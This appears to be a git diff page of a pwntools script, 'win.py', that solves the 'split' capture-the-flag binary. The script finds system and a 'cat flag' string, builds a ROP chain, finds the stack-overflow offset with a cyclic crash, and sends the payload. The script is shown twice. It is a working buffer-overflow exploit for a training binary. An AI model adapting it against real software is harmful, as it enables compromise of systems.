zachriggle · September 25, 2017 23:03
diff --git a/win.py b/win.py
 from pwn import *

 # Set up pwntools to work with this binary
 elf = context.binary = ELF('split')

 # We need to invoke system("cat flag"), which requires knowing the
 # location of both the function 'system' as well as the string 'cat flag'.
 system = elf.symbols.system
 cat_flag = elf.search("cat flag").next()

 info("%#x system", system)
 info("%#x cat flag", cat_flag)

 # We need to ROP to call system().
 #
 # For 32-bit, we just need to set up the stack correctly.
 # For 64-bit, we need to load the address of cat_flag into
 # the register RDI.
 #
 # Luckily, pwntools knows all about this and handles it for us.
 rop = ROP(elf)
 rop.system(cat_flag)

 info(rop.dump())

 # Again, we will automatically discover the offset with a cyclic pattern.
 #
 #==============================================================================
 #                        DISCOVER OFFSETS AUTOMATICALLY
 #==============================================================================
 # Figure out how big of an overflow we need by crashing the
 # process once.
 io = process(elf.path)

 # We will send a 'cyclic' pattern which overwrites the return
 # address on the stack.  The value 128 is longer than the buffer.
 io.sendline(cyclic(128))

 # Wait for the process to crash
 io.wait()

 # Open up the corefile
 core = io.corefile

 # Extract the faulting address, which should contain our cyclic pattern
 fault = core.fault_addr
 info("%r fault", fault)
 #==============================================================================
 #                               END OFFSET DISCOVERY
 #==============================================================================

 # Craft a new payload which puts the ROP stack at the correct offset
 payload = fit({
    fault: str(rop)
 })

 # Send the payload to a new copy of the process
 io = process(elf.path)
 io.recvuntil("> ")
 io.sendline(payload)

 # Get our flag!
 flag = io.recvline()
 success(flag)
	from pwn import *

	# Set up pwntools to work with this binary
	elf = context.binary = ELF('split')

	# We need to invoke system("cat flag"), which requires knowing the
	# location of both the function 'system' as well as the string 'cat flag'.
	system = elf.symbols.system
	cat_flag = elf.search("cat flag").next()

	info("%#x system", system)
	info("%#x cat flag", cat_flag)

	# We need to ROP to call system().
	#
	# For 32-bit, we just need to set up the stack correctly.
	# For 64-bit, we need to load the address of cat_flag into
	# the register RDI.
	#
	# Luckily, pwntools knows all about this and handles it for us.
	rop = ROP(elf)
	rop.system(cat_flag)

	info(rop.dump())

	# Again, we will automatically discover the offset with a cyclic pattern.
	#
	#==============================================================================
	# DISCOVER OFFSETS AUTOMATICALLY
	#==============================================================================
	# Figure out how big of an overflow we need by crashing the
	# process once.
	io = process(elf.path)

	# We will send a 'cyclic' pattern which overwrites the return
	# address on the stack. The value 128 is longer than the buffer.
	io.sendline(cyclic(128))

	# Wait for the process to crash
	io.wait()

	# Open up the corefile
	core = io.corefile

	# Extract the faulting address, which should contain our cyclic pattern
	fault = core.fault_addr
	info("%r fault", fault)
	#==============================================================================
	# END OFFSET DISCOVERY
	#==============================================================================

	# Craft a new payload which puts the ROP stack at the correct offset
	payload = fit({
	fault: str(rop)
	})

	# Send the payload to a new copy of the process
	io = process(elf.path)
	io.recvuntil("> ")
	io.sendline(payload)

	# Get our flag!
	flag = io.recvline()
	success(flag)